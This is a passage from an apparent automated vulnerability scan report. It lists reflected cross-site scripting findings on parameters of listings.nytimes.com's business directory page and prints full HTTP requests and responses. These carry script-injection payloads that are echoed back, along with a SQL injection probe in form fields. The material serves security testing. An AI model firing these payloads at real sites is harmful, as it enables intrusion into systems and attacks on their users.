25-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91533
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCADTSTCS=AHIPGLGAPPLGMOLJAEFDEPGH; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIdsAB" value="125-522621,125-567005,125-364577,125-333056,125-565752,125-389754,125-405051,125-558962,125-441721,125-5425062f36d"><script>alert(1)</script>170db026d9641dabd">
...[SNIP]...

4.272. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsAC parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsAC request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79fb9"><script>alert(1)</script>66465b5259b31f911 was submitted in the sLsIdsAC parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-47569579fb9"><script>alert(1)</script>66465b5259b31f911&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91511
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCBSSQAT=JENKJLNDBMHNHNFCKHPNENDJ; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIdsAC" value="125-521855,125-495755,125-503906,125-565552,125-556750,125-475131,125-202650,125-510030,125-570191,125-47569579fb9"><script>alert(1)</script>66465b5259b31f911">
...[SNIP]...

4.273. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsAC parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsAC request parameter is copied into the HTML document as plain text between tags. The payload c4556<script>alert(1)</script>3bede2279c3 was submitted in the sLsIdsAC parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695c4556<script>alert(1)</script>3bede2279c3&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c12
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:33:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695c4556<script>alert(1)</script>3bede2279c3&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125
...[SNIP]...

4.274. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsAD parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsAD request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 341cf"><script>alert(1)</script>d8b3aad41acb73125 was submitted in the sLsIdsAD parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311341cf"><script>alert(1)</script>d8b3aad41acb73125&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91519
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCDTSTDT=NJOLPOGAEPLNDDNHICJGLCNG; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIdsAD" value="125-555585,125-565528,125-520249,125-541247,125-556121,125-547008,125-568447,125-545194,125-512492,125-297311341cf"><script>alert(1)</script>d8b3aad41acb73125">
...[SNIP]...

4.275. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsAD parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsAD request parameter is copied into the HTML document as plain text between tags. The payload 22780<script>alert(1)</script>00cef0b2819 was submitted in the sLsIdsAD parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
